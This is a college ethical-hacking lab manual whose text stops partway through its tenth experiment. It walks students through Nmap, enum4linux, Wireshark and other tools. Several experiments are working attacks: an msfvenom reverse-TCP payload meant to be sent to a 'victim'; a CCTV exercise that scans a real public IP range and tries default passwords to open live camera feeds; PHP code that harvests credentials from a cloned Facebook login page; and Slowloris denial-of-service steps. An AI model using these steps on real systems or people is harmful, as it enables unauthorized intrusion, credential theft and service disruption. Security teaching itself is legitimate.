2021-22

MALLA REDDY ENGINEERING COLLEGE B.Tech.

Onwards
(Autonomous) VI Semester
(MR-21)
Code: B6215 L T P
ETHICAL HACKING LAB
Credits: 1.5 - - 2

Course Objectives:

 The aim of this lab is to learn different types of attacking techniques.

 Student will learn to execute standard hacking tools in an ethical manner.

List of Experiments:

1. Mention and practice all the basic Linux terminal commands.

2. Study all the Google Dorks uses for information gathering.
3. Perform network scanning using the Nmap tool.
4. Create a TCP reverse shell using Metasploit framework and perform some actions in it.
5. Perform CCTV hacking using the Advanced IP Scanner tool.
6. Practice name server lookup (NsLookup) tool with different options.
7. Enumerate information from Windows and Samba host using the Enum4linux tool.
8. Perform network sniffing using the Wireshark tool.
9. Create a social networking website login page using the phishing techniques.
10. Perform DDOS attack using the Slowloris tool.
11. Perform SQL injection attack using the SQLmap tool.
12. Practice encryption and decryption of text files using the Ccrypt tool.

Course Outcomes:

 To gain knowledge about different Ethical hacking techniques.

 To learn about various types of attacks, security threats and vulnerabilities present in the
computer system.
 To learn about cryptography and basics of web application attacks.

CO-PO, PSO Mapping

(3/2/1indicates strength of correlation) 3-Strong, 2-Medium, 1-Weak
Program Outcomes(POs) PSOs
CO
PO1 PO PO PO PO PO PO PO PO PO PO PO PSO PSO PSO
2 3 4 5 6 7 8 9 10 11 12 1 2 3
CO 1 1 1 1 1 1 1
1
CO 1 2 2 2 1 1 1 2
2
CO 1 1 1 2 1 1 1 1
3
 Experiment No. 1
Aim: Mention and practice all the basic Linux terminal commands.

Lab Objectives: The objective of this lab is to demonstrate how to use basic Linux
commands in the terminal.

 Students will also learn how to use file manager (Thunar).

Lab Requirements: Kali Linux running as a virtual machine.

Theory: Kali Linux is a Linux distribution designed for digital forensics and penetration
testing. It is maintained and funded by Offensive Security. It was developed by Mati Aharoni
and Devon Kearns of Offensive Security through the rewrite of BackTrack, their previous
information security testing Linux distribution based on Knoppix. The tagline of Kali Linux
and BackTrack is "The quieter you become, the more you are able to hear".

Kali Linux is based on the Debian Testing branch: most packages Kali uses are imported
from the Debian repositories. Kali Linux has approximately 600 penetration-testing programs
(tools), including Armitage, Nmap, Wireshark, metasploit, John the Ripper, sqlmap,
Aircrack-ng, Burp suite, etc.

The following table provides a very brief list of the standard, well-known, and defined top-
level Kali Linux directories and their purposes. Referencing those directories when accessing
them is accomplished by using the sequentially deeper directory names connected by forward
slashes (/) such as /var/log and /var/spool/mail. These are called paths.

Directory Description
/ The root filesystem is the top-level directory of the filesystem. It contains all

(root of the files required to boot the Linux system before other filesystems are

filesystem) mounted. It must include all of the required executables and libraries
required to boot the remaining filesystems. After the system is booted, all
other filesystems are mounted on standard, well-defined mount points as
subdirectories of the root filesystem.
/root This is not the root (/) filesystem. It is the home directory for the root user.
/home Home directory storage for user files. Each user has a subdirectory in /home.
/home/kali This is the default directory in the terminal. It is represented by ~ symbol.
/bin The /bin directory contains user executable files. Ex: ls, cd, mv etc.
 /sbin System binary files. These are executables used for system administration.
/etc Contains the local system configuration files for the host computer.
/tmp Temporary directory. Used by the operating system and many programs to
store temporary files.
/usr These are shareable, read-only files, including executable binaries and
libraries, man files, and other types of documentation.
/usr/bin Contains all the Kali Linux applications (apt, nmap, etc).
/usr/share Contains the application support and data files.
/lib Contains shared library files that are required to boot the system.
/var Variable data files are stored here. This can include things like log files,
MySQL, and other database files, web server data files, email inboxes, and
much more.
/boot Contains the static bootloader and kernel executable and configuration files
required to boot a Linux computer.
/dev This directory contains the device files for every hardware device attached to
the system. These are not device drivers, rather they are files that represent
each device on the computer and facilitate access to those devices.
/media A place to mount external removable media devices such as USB thumb
drives that may be connected to the host.
/mnt A temporary mountpoint for regular filesystems (as in not removable media)
that can be used while the administrator is repairing or working on a
filesystem.
/opt Optional files such as vendor supplied application programs should be
located here.

The following is the list of some Kali Linux basic commands:

whoami ifconfig pwd sudo su exit ls dir

cd cd .. nano touch cat mkdir rm
rmdir cp mv history users wc diff
man help tree chmod gedit apt-get update apt-get upgrade
date cal history clear sleep reboot shutdown
Procedure:

Step1: Log into Kali Linux machine and open a Terminal Window

Command1: Type whoami and hit enter, to get the result.

Command2: Type ifconfig and hit enter, to see the IP address of the host system.

Command3: Type pwd and hit enter, to print the (present) working directory.

Command4: Type sudo su and hit enter, and enter the password to switch the present user
i.e. kali to super user i.e. root.
Command5: Type exit and hit enter, to return back from root user to the normal user i.e.
kali.

Command6: Type ls and hit enter, to get the files and folders in that directory.

Command7: Type cd and hit enter, to change directory.

Command8: Type cd .. and hit enter, to go one step back from the current working directory.

Command9: Type nano <filename.txt> and hit enter, it will open the editor.

Enter the text that you want to save in that text file.
Press Ctrl+S to save and Ctrl+X to exit from the editor.

Command10: Type cat <filename.txt> and hit enter to see what is there in that text file.

Command11: Type mkdir <directory name> and hit enter. It will create one
directory/folder.

Command12: Type rm <filename.txt> and hit enter to delete the text file.

Command13: Type rmdir <directory name> and hit enter to delete that directory/folder.

Command14: Type cp <filename.txt> <folder name> and hit enter. It will copy the same
file into that folder. Note: We can copy all types of files using this command.
Command15: Type mv <filename.txt> <folder name> and hit enter. It will move the entire
file to that folder. Note: We can move all types of files using this command.

Command16: Type history and hit enter to get the result. It will show all the commands that
we used in that terminal.

Step2: Close the Terminal Window and Log out from Kali Linux machine.

Viva Questions:

1. Explain about Kali Linux?

2. What is the root filesystem?

3. Who developed the Kali Linux?

4. Approximately how many tools are there in Kali Linux?

5. What is the use of ifconfig command?

6. What is the difference between cp and mv commands?

7. What will history command display?

 Experiment No. 2
Aim: Study all the Google dorks uses for information gathering.

Lab Objectives: The objective of this lab is to demonstrate how to use different types of
dorks for collecting information about a target.

Lab Requirements: Google Chrome Browser.

Theory: Google dorking, also called Google hacking, is a search-hacking technique that
uses advanced search queries to uncover hidden information in Google. Google dorks, or
Google hacks, refer to the specific search commands (including special parameters and
search operators) that when entered into the Google search bar reveal hidden parts of
websites.

Google dorking is used to find hidden information that is otherwise inaccessible through a
normal Google search. Google dorks can reveal sensitive or private information about
websites and the companies, organizations, and individuals that own and operate them.

When Google crawls the web to index pages for its search engine, it can see parts of websites
that normal internet users can’t. Google dorks and Google hacks uncover some of that hidden
data, letting you see information that organizations, companies, and website owners may not
want you to see.

A simple example of an advanced search query is the use of quotation marks. Using quotation
marks in searches gives you a list of results that includes web pages where the complete
phrase is used, rather than some combination (complete or incomplete) of the individual
words you entered into the search field.

There are many more types of Google hacks using advanced search queries, but their
technical explanations don’t actually get much more complicated than that. Their power lies
in the ability to use them creatively.

Google dorking is completely legal — it’s just another form of searching after all. Google
was built to handle advanced searches, and banning this functionality would limit information
access.

Procedure: Open this link -> https://www.exploit-db.com/google-hacking-database to

practice more google dorks.
1. Site: Using “site:” in a search command will provide results only from the specific website
mentioned.
2. Intitle: Using “intitle:” asks Google to search only for pages with that specific text in their
HTML pages titles.

3. Inurl: Using “inurl:” will search only for pages with that specific text in their URL.

4. Intext: Using “intext:” in a search query will search only for the supplied keywords. In the
example below, all results listed will have the quoted text somewhere on the page.
5. Filetype: Using “filetype:” will narrow our search to the specific file type mentioned.

6. Index of: Using "Index of /" will display the files uploaded on internet by companies,
these files could be very crucial while pen testing.

Click this URL to see the result: https://lira.epac.to/DOCS-TECH/Hacking/Google/

Viva Questions:

1. What is Google hacking?

2. Why we use Google dorking?

3. What is Google Hacking Database?

4. What is the use of “index of /” Google dork?

 Experiment No. 3
Aim: Perform network scanning using the Nmap tool.

Lab Objectives: The objective of this lab is to demonstrate how to use nmap commands for
different operations in network scanning.

Lab Requirements: Kali Linux running as a virtual machine, Nmap tool.

Theory: Nmap, which stands for "Network Mapper," is an open-source tool that lets you
perform scans on local and remote networks. It is a security auditing tool used in the security
field to actively enumerate a target system/network. It is one of the most extensively used
tools by network administrators and conversely attackers for reconnaissance (enumeration),
the first step in the 5 phases of hacking. Nmap is used to actively probe the target network for
active hosts(host discovery), port scanning, OS detection, version details, and active services
running on the hosts that are up. For this, Nmap uses the technique of sending packets and
analyzing the responses.

Port Scanning is one of the features of Nmap wherein the tool detects the status of the ports
on active hosts in a network. The status of the ports can be open, filtered, or closed. Type
Nmap in the command line to run Nmap. Add necessary switches according to the scanning
type to initiate a specific scan technique.

Types of Port Status:

 Open: The open status means that the given port is open and is actively running a
service.
 Filtered: The filtered status means that the respective port might be hidden behind a
firewall and its status remains unknown.
 Closed: The closed state represents a given port is closed on the host machine.

To read more about nmap click on this link: https://nmap.org/book/toc.html.

Procedure: Open the terminal in Kali Linux and install nmap tool.

Command 1: nmap <IP Address> or nmap <URL>

This is a simple scan in which we will get open ports, state and service of ports, MAC
Address. It is also shows whether the host is up or not. We can also scan the total IP range.
Note: By default, nmap scans for TCP ports (10000) only.
Command 2: nmap -v <IP Address>

v stands for verbose, which is uses to print more information about the scan in progress. we
can use the -v or -vv (very verbose) options to increase the verbosity of the output.

Note: By default, nmap uses SYN Stealth Scan only.

Command 3: nmap -p 1-65535 <IP Address> or nmap -p- <IP Address>
These commands will scan and show all the 65535 ports and their services.

Command 4: nmap -O <IP Address>

This command will scan and show operating system’s information in detail.
Command 5: nmap -sV <IP Address>

This command will scan for version scanning of all the ports.

Command 6: nmap -T5 -O <IP Address>

T0, T1, T2, T3, T4, and T5 are the timing flags scan to get slow or fast output based on flag.
Viva Questions:

1. What is the full form of nmap?

2. What will we get using nmap?

3. How many types of port statuses are there and what are they?

4. By default nmap will scan for what?

 Experiment No. 4
Aim: Create a TCP reverse shell using Metasploit framework and perform some actions in it.
Lab Objectives: The main objective of this lab is to create a payload which is used to exploit
a windows system.

Lab Requirements: Windows system, Kali Linux running as a virtual machine, MSF venom
and MSF console.

Theory: Metasploit Framework:

The Metasploit Framework is a Ruby-based, modular penetration testing platform that

enables you to write, test, and execute exploit code. The Metasploit Framework contains a
suite of tools that you can use to test security vulnerabilities, enumerate networks, execute
attacks, and evade detection. At its core, the Metasploit Framework is a collection of
commonly used tools that provide a complete environment for penetration testing and exploit
development.

MSF console:

MSF console provides a command line interface to access and work with the Metasploit
Framework. The MSF console is the most commonly used interface to work with the
Metasploit Framework. The console lets you do things like scan targets, exploit
vulnerabilities, and collect data.

Modules are the core components of the Metasploit Framework. A module is a piece of
software that can perform a specific action, such as scanning or exploiting. Each task that you
can perform with the Metasploit Framework is defined within a module.

There are a few types of modules. The module type depends on the purpose of the module
and the type of action that the module performs. The following are module types that are
available in the Metasploit Framework:

 Exploit - An exploit module executes a sequence of commands to target a specific

vulnerability found in a system or application. An exploit module takes advantage of a
vulnerability to provide access to the target system. Exploit modules include buffer
overflow, code injection, and web application exploits.
  Auxiliary - An auxiliary module does not execute a payload. It can be used to
perform arbitrary actions that may not be directly related to exploitation. Examples of
auxiliary modules include scanners, fuzzers, and denial of service attacks.
 Post-Exploitation - A post-exploitation module enables you to gather more
information or to gain further access to an exploited target system. Examples of post-
exploitation modules include hash dumps and application and service enumerators.
 Payload - A payload is the shell code that runs after an exploit successfully
compromises a system. The payload enables you to define how you want to connect
to the shell and what you want to do to the target system after you take control of it. A
payload can open a Meterpreter or command shell. Meterpreter is an advanced
payload that allows you to write DLL files to dynamically create new features as you
need them.
 NOP generator - A NOP generator produces a series of random bytes that you can
use to bypass standard IDS and IPS NOP sled signatures. Use NOP generators to pad
buffers.

MSF venom:

MSF venom is a standalone payload generator. It is a combination of MSF payload and MSF
encode. It is fast and uses a single instance. It is also standardized command-line and has core
options. You can generate payloads for many platforms like Cisco, Android, Mac OS,
Solaris, Firefox, Windows, Unix, Node.js and many more. When creating an MSF payload,
there are three common payloads that you would utilize.

 The first one is a bind shell. A bind shell is a kind that opens up a new service on the
target machine and requires the attacker to connect to it in order to get a session.
 Then of course, we have the reverse TCP payload. A reverse shell (also known as a
connect-back) is the exact opposite: it requires the attacker to set up a listener first on
his/her box, the target machine acts as a client connecting to that listener, and then
finally the attacker receives the shell.
 Then we also have the HTTPS payload. Now, what if the victim blocks the TCP
and Bind ports. Well in that case we have an HTTPS port open which is 443.

Once the payload is generated and sent to the victim for execution. When the file is executed
on the victim machine, it will give you a meterpreter session starting from meterpreter >.
Procedure: First of all, check the IP Address of the Kali Linux machine and note it down
(Ex: 192.168.31.128).

Step1: To create a TCP reverse connection payload run the following command

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Host IP Address>

LPORT=<Port Number> -f exe -o filename.exe

Step2: Share this exe file (or payload) to the victim.

Step3: run msfconsole command in another tab.

Step4: Use an appropriate handler for our payload. Ex: use exploit/multi/handler
Step5: Set an appropriate payload for our handler. Ex: set payload windows/meterpreter/reverse_tcp

Step6: Now we need to set some payload options like LHOST and LPORT in this step.

Step7: To set LHOST run set LHOST <IP Address> command and To set LPORT run set
LPORT 1234 command and then verify the options again.

Step8: To start listening run the run command and hit enter.

Step9: Now on the windows machine download and run the exe file for one time. It will
create one session in the msfconsole and also it will open a meterpreter session here.
Step10: Now we have the complete control on the victim machine. Here we have different
options to perform on the victim machine. To see them run help command and hit enter.

Not only this we will get more commands that we can execute on the victim machine. Ex:
sysinfo command will display the information related to victim’s system details.

Like this try and practice all the commands that are available there.
Viva Questions:

1. What is metasploit framework?

2. What is msfvenom?

3. What is msfconsole?

4. What is reverse TCP payload?

5. What are LHOST and LPORT?

6. What is a Payload?
 Experiment No. 5
Aim: Perform CCTV hacking using the Advanced IP Scanner tool.

Lab Objectives: The objective of this lab is to know how weak or default credentials are
uses in the process of CCTV camera hacking.

Lab Requirements: Advanced IP Scanner tool, IE Tab extension in Chrome browser, and
Camera plug-ins.

Theory: Closed-circuit television (CCTV) surveillance is one of many investments that more
businesses are prioritizing when protecting their facilities. While it can prove invaluable at
securing our premises and preventing unwanted intrusion or trespassing, one often invisible
threat can hoodwink even the most experienced operatives in the game. It’s ironic
considering video surveillance is meant to prevent unwanted access.

While considerable advances have been made in the world of digital transformation, highly
sophisticated technology like CCTV camera equipment is worryingly vulnerable to hacks.
Cybercriminals and malicious actors have found new techniques to surpass strict security
protocols and gain remote access to a business’s video surveillance systems.

As these systems often keep a proverbial “watchful eye” on valuable assets or entry and exit
points of businesses, it’s crucial to ensure that these modern and innovative camera systems
don’t present themselves as easy bait for cybercriminals.

While some malicious actors may use a simple exploitation method, many of their tactics are
intricate and complex, making it increasingly hard for cybersecurity professionals to detect,
much less contain. Once a surveillance network is compromised, a hacker can monitor our
estate or take control of it. Many organizations are concerningly behind when it comes to
safeguarding their camera equipment, wrongly believing that this technology is inherently
fool-proof and cannot possibly fall into the wrong hands. Sadly, the opposite is very much
true. Let’s look at some of the common vulnerabilities that exist within a business’s CCTV
camera setup.

 Remote Hacks: If an IoT (Internet of Things) camera transmits video feeds via the
internet, hackers may find their way into the system through the online IP address
after obtaining the signature information and default password, which many
 businesses do not change (more on this later) and which are often not supported by
two-factor authentication (2FA).
 Local Hacks: CCTV cameras are often hooked into a network wireless router with a
built-in modem, and organizations do not always update the default network name
and password. If a hacker cannot gain access to the cameras themselves, they can
access the network and weave their way into the cameras that are connected to it.
They will often spoof the wireless network into thinking they are registering an
authentic device, or try and overload the network by denial-of-service (DoS).
 Backdoor Attacks: Backdoors provide unauthorized access to a computer system or
encrypted data that bypasses the infrastructure’s primary security controls. Backdoors
may often be created for the purposes of legitimate troubleshooting or remote access
in the event of a fault. However, threat actors can locate these backdoors, often as a
result of unpatched or outdated security software, firewalls, and firmware. Hackers
can usually spot these vulnerabilities with ease.
 Brute Force: These types of attacks occur when hackers try to guess an
administrator’s login credentials manually, often with the assistance of algorithms that
can make numerous guesses within seconds. Whether the username is used alongside
passwords or PIN combinations, many organizations fail to adopt a strong password
policy for all of their users’ shared equipment, meaning that default passwords like
“1234,” “password,” “0000,” or “administrator” are very easy to exploit.

Procedure:

Step1: Run Advanced IP Scanner tool as an administrator.

Step2: Find the IP address of your target CCTV camera or else find the IP range of that
particular CCTV exists. Ex: 192.168.0.12 (single IP) or 192.168.0.1-254 (IP range).

Ex: Our target camera is on IP 106.51.1.164, so take IP range as 106.51.1.1-254.

Enter this IP range in the tool and click on Scan button.

It will show all the shared folders, printers, scanners, servers, routers, RDPs, CCTV
cameras and so on in it. It will also show the live and dead devices on that specific network.

Step3: Add “IE Tab” extension to the Chrome browser.

Note: Make chrome browser as a default browser in your system.

Step4: In the Advanced IP Scanner tool click on each greater than “ > ” symbol and search
for CCTV cameras.

Ex: CP Plus, Hikvision, Zebronics, Dahua , HTTP web etc.

Step5: Double click on your target link. It will be open in chrome browser. Do not try to
login here.

Click on extensions and select IE Tab. We should open the camera in IE Tab only.

Note: If required, install the plug-ins of that camera.

Step6: Try all the default usernames and passwords here in this step. If the configuration
of the camera is vulnerable we can enter into the camera.

Ex: Usernames: admin, Admin & Passwords: admin, admin@123, admin123, 12345, 123456.

If the entered username and password are correct it will open the Live View.
Note: We can perform no of different operations using this dashboard.

Note: Do not change anything because if you change anything you will be behind bars.

Viva Questions:

1. What is Advanced IP Scanner tool?

2. What is mean by extension and why we use extensions?

3. What is the full form of CCTV?

4. Mention different types of CCTVs that you know.

5. Give some examples for CCTV companies.

6. What are the default usernames and passwords for CCTVs?

 Experiment No. 6
Aim: Practice name server lookup (NsLookup) tool with different options.

Lab Objectives: The main objective of this lab is to understand better about a domain’s
management.

Lab Requirements: Kali Linux, nslookup tool

Theory:

Nslookup:

Nslookup (stands for “Name Server Lookup”) is a useful command for getting information
from the DNS server. It is a network administration tool for querying the Domain Name
System (DNS) to obtain domain name or IP address mapping or any other specific DNS
record. It is also used to troubleshoot DNS-related problems.

Nslookup syntax:

The Nslookup syntax is very simple, and we can use it the same on different OSes.

nslookup [options] [hosts]

(or)

nslookup [-options] [name | -] [server]

Options: First, we will put the option we want to use with the domain name or IP address.
The option can be related to the type of DNS record, timeout, a port in use, debugging, or
another.

Name: Here we will put the hostname (domain name) or IP address. It is the target of our
DNS query.

Additional Options: Depending on the query, we can add an extra option as a parameter.

Server: We can use the default server for our query or specify another one from where we
want the DNS query to be performed.

The Nslookup command is a very popular and powerful tool. So, it is not a surprise that a lot
of administrators use it for testing and troubleshooting their networks. There are two main
reasons why we need to use the Nslookup command.
  The first one is obviously for troubleshooting server connections. Thanks to its
beneficial functionalities, we can get the information we need quickly. In addition, it
is extremely easy to use, and it is available on every operating system (OS).
 The second reason is not so obvious, but it should not be neglected. That is security
and safety. It can be helpful for protecting against different phishing attacks, which
involve falsifying a domain name. Attackers use a misspelled domain name or trick
users by adding or omitting a hyphen. Some examples are when they replace the
numeral 1 for a lowercase l (examp1e.com), or the phishing domain could be insta-
gram.com instead of instagram.com. These tactics are used to trick regular users and
make it seem that an unfriendly site looks friendly and familiar.

Nslookup can also help to prevent another malicious attempt – DNS cache poisoning.
With this attack, criminals place fraudulent data and distribute it to the DNS recursive
servers, pointing to a fake authoritative server.

Procedure:

No 1: To find the A record of а domain.

We can use this command to see how many A records are there and see the IP Addresses of
each one.

Command: nslookup cloudns.net

No 2: To check the NS records of a domain.

By checking the NS records, we can see which is the authoritative server for a specific
domain.

Command: nslookup -type=ns cloudns.net

No 3: To query the SOA record of a domain.

With this one, we can see the start of authority and get information about the zone.
Command: nslookup -type=soa cloudns.net
No 4: To find the MX records responsible for the email exchange.

Here we are checking the MX records of the mail servers. We can see if all the mail servers
are working well.

Command: nslookup -query=mx cloudns.net

No 5: To check the Reverse DNS Lookup.

Many times, we check the A records to see the IPs of a domain, but sometimes we need to
verify if an IP address is related to a specific domain. For that purpose, we need a reverse
DNS lookup.

Command: nslookup 185.136.96.96

No 6: To check for a PTR record.

We can verify if an IP address belongs to a domain name by performing a reverse DNS

query. For this purpose, we will need to check the PTR record that links an IP address to a
domain name. We will need to put the IP address in reverse (185.136.96.96 changes to
96.96.136.185), and we need to add in-addr.arpa because it is stored in arpa’s top-level-
domain.

Command: nslookup -type=ptr 96.96.136.185.in-addr.arpa

No 7: To change the timeout interval for a reply.

We can manually choose the timeout time in seconds. We can increase it to give more time
for the server to respond. We can also shorter it to see which servers can respond quicker.

Command: nslookup -timeout=20 cloudns.net

No 8: To enable debug mode.

Debug mode provides important and detailed information both for the question and for the
received answer.

Command: nslookup -debug cloudns.net

Viva Questions:

1. What is the full form of Nslookup?

2. What is the syntax of Nslookup?

3. What is the command to find A records?

4. What is the command to find NS records?

5. What is the command to find SOA record?

6. What is the command to find MX records?

7. What is the command to find PTR record?

 Experiment No. 7
Aim: Enumerate information from Windows and Samba host using the Enum4linux tool.

Lab Objectives: The objective of this lab is to help students understand and enforce various
enumeration techniques to enumerate:

 Connected devices
 Hostname and information
 Domain
 Hardware and storage information
 Software components
 Total Memory

Lab Requirements: Kali Linux and Metasploitable2

Theory: The Enum4linux tool is an alternative to enum.exe for enumerating data from
Windows and Samba hosts.

Key features of Enum4linux tool:

 RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)

 User listing (When RestrictAnonymous is set to 0 on Windows 2000)
 Listing of group membership information
 Share enumeration
 Detecting if host is in a workgroup or a domain
 Identifying the remote operating system
 Password policy retrieval (using polenum)

Overview:

Enum4linux is a tool for enumerating information from Windows and Samba systems. It
attempts to offer similar functionality to enum.exe formerly available from
www.bindview.com.

It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpclient, net
and nmblookup.

Dependencies:
We need to have the Samba package installed as this script is basically just a wrapper around
rpcclient, net, nmblookup and smbclient.

The following command will attempt to enumerate information provided valid login
credentials.

Command Reference:

Target IP: 10.10.10.1

Username: john

Password: password123

Command:

enum4linux -u john -p password123 -a 10.10.10.1

Procedure: Open the Kali Linux Terminal Window. ( or we can go to -> Applications -> 01-
Information Gathering -> SMB Analysis -> enum4linux ).

Step1: In the terminal window type enum4linux -h command and hit Enter to get the help
options of enum4linux.

Help options appear as shown in the screenshot. Now in this lab, we will demonstrate only a
few options to conduct enumeration on the target machine.
Step2: Type enum4linux <IP Address> command and hit enter. We will get all the
information about our target machine here.

Step3: Type enum4linux -U <IP Address> command and hit enter. To see the user list in
that target machine.

Step4: Type enum4linux -P <IP Address> command and hit enter. To see the password
policy information in that target machine.
Step5: Type enum4linux -S <IP Address> command and hit enter. To see the share list in
that target machine.

Step6: Type enum4linux -G <IP Address> command and hit enter. To see the group and
member list in that target machine.

Step7: Type enum4linux -a <IP Address> command and hit enter. To do all simple
enumeration (-U -S -G -P -r -o -n -i) in that target machine.

Note: This option is enabled if we don't provide any other options.

Not only this we will get more information about our target like in step2.

Step8: Type enum4linux -U -o <IP Address> command and hit enter. To see the user list
and OS details in that target machine.

Step9: Type enum4linux -u <Username> -p <Password> -U <IP Address> command and

hit enter. To see the known usernames in that target machine.

Viva Questions:

1. What is an Enumeration?

2. What can we enumerate by using enum4linux tool?

3. What are the key features of enum4linux tool?

 Experiment No. 8

Aim: Perform network sniffing using the Wireshark tool.

Lab Objective: The objective of this practical is to study and understands the concept of
network sniffing using Wireshark.

Lab Requirements: Wireshark tool and Kali Linux.

Theory: Computers communicate using networks. These networks could be on a local area
network LAN or exposed to the internet. Network Sniffers are programs that capture low-
level package data that is transmitted over a network. An attacker can analyze this
information to discover valuable information such as user ids and passwords.

Network sniffing is the process of capturing data packets sent over a network. This can
be done by the specialized software program or hardware equipment. Sniffing can be used to;

 Capture sensitive data such as login credentials

 Eavesdrop on chat messages
 Capture files that have been transmitted over a network
 The following are protocols that are vulnerable to sniffing
 Telnet
 Rlogin
 HTTP
 SMTP
 NNTP
 POP
 FTP
 IMAP

The above protocols are vulnerable if login details are sent in plain text Wireshark is a free
and open-source packet analyzer. It is used for network troubleshooting, analysis, software
and communications protocol development, and education. Wireshark is cross-platform,
using the Qt widget toolkit in current releases to implement its user interface, and using pcap
to capture packets; it runs on Linux, macOS, BSD, Solaris, some other Unix-like operating
systems, and Microsoft Windows. There is also a terminal-based (non-GUI) version called
TShark. Wireshark is used to capture and analyse packets in network. It is also used as a
sniffer, network protocol analyzer, and network analyzer. We can also apply specific filter on
network traffic to get more filtered data packets.

Color Coding:

Different packets are seen highlighted in various different colors. This is Wireshark’s way of
displaying traffic to help you easily identify the types of it. Default colors are:

 Light Purple color for TCP traffic

 Light Blue color for UDP traffic
 Black color identifies packets with errors – example these packets are delivered in an
unordered manner.

To check the color coding rules, click on View and select Coloring Rules. These color-coding
rules can be customized and modified to fit your needs.

Procedure:

Step1: Open the terminal in Kali Linux and type wireshark and hit enter to open the tool.
Step2: Select eth0 and click on Start capturing packets icon. It will start capturing.

Step3: Now start any browser and open this webpage http://testphp.vulnweb.com/login.php.
Step4: Enter Username and Password and click on login button.

Step5: Now get back to wireshark tool and click on Stop capturing packets icon.

Step6: Now type http.request.method == "POST" in the search bar and hit enter.
Step7: Click on HTML Form URL Encoded. We can see the previously entered Username
and Password here.

Viva Questions:

1. What is Wireshark?

2. What is the main purpose of Wireshark?

3. What is Network sniffing?

4. What are the default colors in Wireshark?

 Experiment No. 9
Aim: Create a social networking website login page using the phishing techniques.

Lab Objectives: To know how to create social media login page for phishing attacks.

Lab Requirements: Xampp Server, VS Code and Firefox Browser.

Theory: Phishing is a form of social engineering where attackers deceive people into
revealing sensitive information or installing malware such as ransomware. Phishing attacks
have become increasingly sophisticated and often transparently mirror the site being targeted,
allowing the attacker to observe everything while the victim is navigating the site, and
transverse any additional security boundaries with the victim.

Types of Phishing:

 Email Phishing: In an email phishing scam, the attacker sends an email that looks
legitimate, designed to trick the recipient into entering information in reply or on a
site that the hacker can use to steal or sell their data.
 Spear Phishing: Spear phishing involves targeting a specific individual in an
organization to try to steal their login credentials. The attacker often first gathers
information about the person before starting the attack, such as their name, position,
and contact details.
 Angler Phishing: Anglers use fake social media posts to get people to provide login
info or download malware.
 Smishing: Smishing is phishing through some form of a text message or SMS.
 Vishing: Vishing, which is short for "voice phishing," is when someone uses the
phone to try to steal information. The attacker may pretend to be a trusted friend or
relative or to represent them.
 HTTPS Phishing: An HTTPS phishing attack is carried out by sending the victim an
email with a link to a fake website. The site may then be used to fool the victim into
entering their private information.
 Pop-up Phishing: Pop-up phishing often uses a pop-up about a problem with your
computer’s security or some other issue to trick you into clicking. You are then
directed to download a file, which ends up being malware, or to call what is supposed
to be a support center.
  Pharming: In a pharming attack, the victim gets malicious code installed on their
computer. This code then sends the victim to a fake website designed to gather their
login credentials.
 Evil Twin Phishing: In an evil twin attack, the hacker sets up a false Wi-Fi network
that looks real. If someone logs in to it and enters sensitive details, the hacker captures
their info.
 Watering Hole Phishing: In a watering hole phishing attack, a hacker figures out a
site a group of users tends to visit. They then use it to infect the users’ computers in
an attempt to penetrate the network.
 Whaling: A whaling attack is a phishing attack that targets a senior executive. These
individuals often have deep access to sensitive areas of the network, so a successful
attack can result in access to valuable info.
 Clone Phishing: A clone phishing attack involves a hacker making an identical copy
of a message the recipient already received. They may include something like
“resending this” and put a malicious link in the email.
 Website Spoofing: With website spoofing, a hacker creates a fake website that looks
legitimate. When you use the site to log in to an account, your info is collected by the
attacker.
 Domain Spoofing: Domain spoofing, also referred to as DNS spoofing, is when a
hacker imitates the domain of a company—either using email or a fake website—to
lure people into entering sensitive information. To prevent domain spoofing, you
should double-check the source of every link and email.
 Deceptive Phishing: Deceptive phishers use deceptive technology to pretend they are
with a real company to inform the targets they are already experiencing a cyberattack.
The users then click on a malicious link, infecting their computer.
 Image Phishing: Image phishing uses images with malicious files in them meant to
help a hacker steal your account info or infect your computer.
 Search Engine Phishing: A search engine phishing attack involves an attacker
making fake products that look attractive. When this pop up in a search engine, the
target is asked to enter sensitive information before purchasing, which then goes to a
hacker.

Procedure:
Step1: First open any one social media website’s login page and copy the source code and
save it in the name of index.html. (In our case it is Facebook login page).

Step2: Create an empty text (log.txt) file. This file helps us to save credentials.

Step3: Create a php file in the name of post.php, to connect html file with the text file and to
redirect to the original website.

Post.php

<?php

// Set the location to redirect the page

header ('Location: http://www.facebook.com');

// Open the text file in writing mode

$file = fopen("log.txt", "a");

foreach($_POST as $variable => $value) {

fwrite($file, $variable);

fwrite($file, "=");

fwrite($file, $value);

fwrite($file, "\r\n");

}
 fwrite($file, "\r\n");

fclose($file);

exit;

?>

Step4: Replace action attribute value with post.php and keep id attribute value empty in
the form tag of index.html file.

Ex: action = “post.php” and id =“ ”

Note: Save these three files in one folder (phishing) and save the folder in the Xampp’s
htdocs folder.

Step5: Start Xampp and open the folder in localhost using any browser.
Step6: Enter Email address or phone number and Password and click on Log in. It will
redirect to the original Facebook login page. (You can check it in the URL section. Both are
different URLs. One is localhost and another is actual Facebook URL.)

Step7: Open log.txt file to see credentials.

Viva Questions:

1. What is phishing?

2. What is whaling?

3. What is smishing?

4. What is website spoofing?

5. What is deceptive phishing?

 Experiment No. 10
Aim: Perform DDOS attack using the Slowloris tool.

Lab Objectives: To know how HTTP Denial of Service attack affects threaded servers.

Lab Requirements: Kali Linux and GitHub.

Theory: Slowloris is a free and Open-source tool available on GitHub. We can perform a
denial-of-service attack using this tool. It’s a framework written in python. This tool allows a
single machine to take down another machine’s web server it uses perfectly legitimate HTTP
traffic. It makes a full TCP connection and then requires only a few hundred requests at long-
term and regular intervals. As a result, the tool doesn’t need to spend a lot of traffic to
exhaust the available connections on a server.

Uses of Slowloris:

 Slowloris sends multiple requests to the target as a result generates heavy traffic
botnets.
 Slowloris can be used to perform DDoS attacks on any webserver.
 It is an open-source tool, so you can download it from GitHub free of cost.
 It uses perfectly legitimate HTTP traffic.
 A denial-of-service attack can be executed with the help of Slowloris by generating
heavy traffic of botnets.

Procedure:

Step1: Open Kali Linux and then open the Terminal. Create a new directory on desktop
named Slowloris and Move to that directory using the following commands.

cd Desktop

mkdir Slowloris

cd Slowloris
Step2: Now we have to clone the Slowloris tool from GitHub in the same directory using the
following command.

git clone https://github.com/gkbrk/slowloris.git

